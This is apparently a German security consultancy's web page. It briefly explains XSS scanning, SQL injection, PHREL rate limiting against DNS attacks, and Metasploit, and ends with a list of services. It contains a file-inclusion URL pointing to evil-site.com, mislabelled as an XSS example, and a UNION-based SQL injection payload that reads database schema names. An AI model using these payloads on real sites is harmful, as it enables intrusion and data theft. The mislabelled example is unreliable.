Sicherheit der Unternemnensdaten hat höchste Priorität

Ganz gleich ob Kommerzielle oder staatlichen Organisationen müssen die Sicherheit der Unternehmensdaten ganz ernst nehmen und die Sicherheit Ihrer Infrastrruktur als ein Prozeß betrachten. Jeden Tag kann ein Zero-Day-Exploit dafür sorgen, dass die Unternehmensdaten in die Fremde Hände fallen.

 

 

XSS Scanning

XSS oder Cross-site Scripting ist eine Schwachstelle (vulnerability) in Webapplikationen.
Beim XSS Scan, handelt es sich um die Such-Technik nach Programmier-Fehler die man für einen XSS-Angriff nutzen kann.
Dafür gibt es verschiedene Tools, Als Open Source Programm leistet XSSer sehr gute Dienste.
Acunetix ist eine sehr professionelle Security Software, die u.a. professionelle XSS Scans durchführt.

Hier ein Beispiel für XSS Attack:

http://www.site.com/index.php?page=http://www.evil-site.com/schädlicher-code.php

SQL-Injection


SQL-Injection oder SQLi ist die Technik, ein SQL-Statement über den Browser an die Web-Applikation
zu schicken, um festzustellen, ob die Web-Applikation, schwach programmiert ist und die SQL-Statements an die Datenbank weiterleitet.
Sollte der SQLi Request ein positives Resultat liefern, dann geht es weiter mit dem Ablesen der Tabellen und die Columns und schließlich die Daten.

Hier ein Beispiel für SQL-Injection Attacke:

http://www.site.com/index.php?id=830&pid=-999.9 UNION ALL SELECT
(SELECT distinct concat(0x7e,0x27,Hex(cast(schema_name as char)),
0x27,0x7e) FROM information_schema.schemata LIMIT 0,1)--

 

Abwehren von DNS-Attacken mit PHREL (Per Host RatE Limiter)


phreld ist der Daemon von Per Host RatE Limiter.
Die Funktionsweise von phreld ist wie folgt:
phreld kontrolliert den ankommenden Traffic und greift ein wenn ein Grenzbereich überschritten ist.
Für Abwehr der DNS-Attacken, muß phreld auf UDP Protokoll und Port 53 konfiguriert sein.
jedes mal wenn phreld eine überschreitung der Grenzwerte (Eingestellt im Konfig-File) erkennt,
trägt er ein CHAIN in IPTABLES ein.
Der CHAIN in IPTABLES schränkt die DNS-Anfragen des Angreifers für einen bestimmte Zeit ein.
Wenn der Angreifer den DNS-Server in Ruhe läszlig;t dann wird dieser CHAIN von IPLATBLES entfent,
sonst wird diese Einschränkung solange fortgesetzt bis der Angreifer gar keine DNS-Anfragen starten kann.

 

Metasploit Framework 3.5.x

Metasploit Framework (MSF) ist aktuell in der Version 3.5.2 verfügbar und wurde vollständig
von PERL in RUBY umgeschrieben. MSF 3.5.2 ist ein Open Source Pentesting Framework,
welche im professionelles Penteing Umfeld für die Suche nach Sicherleitslücken eingesetzt wird.
Metasploit Framework besteht aunter anderem aus diversen Exploits und Payloads.
Der Exploit wird zum Eindringen ins Zielsystem benutzt und mit Payload ist ein Code gemeint,
der auf dem Zielsystem nach einem erfolgreichen Einbruchausgeführt wird und einen Zugang von
aßen ermöglicht. Wie z.B. shell, Meterpreter oder VNC

Die Shellcode-Datenbank von Metasploit Framework enthält in Assembler geschriebene Payloads,
die regelmäßigen aktualisiert und erweitert werden.

 

Unser Serviceangebot

  • Beratung & Konzeption
  • Infrastruktur Penetrationstests extern und intern
  • Vulnerability Management
  • Web Applikations Penetrationstests (WAS)
  • System-, Design und Source Code Reviews
  • Härtung Ihrer System
  • IT-Forensische Untersuchungen und Beweissicherung

Unsere Kompetenz

  • Sicherheit Ihrer Unternehmensdaten
  • Analyse von Schwachstellen und Sicherheitslücken
  • Lösungserarbeitung und Implementierung
  • Markt und die Produktübersicht
  • Kundenorientierung
  • Unabhängigkeit und Produktneutralität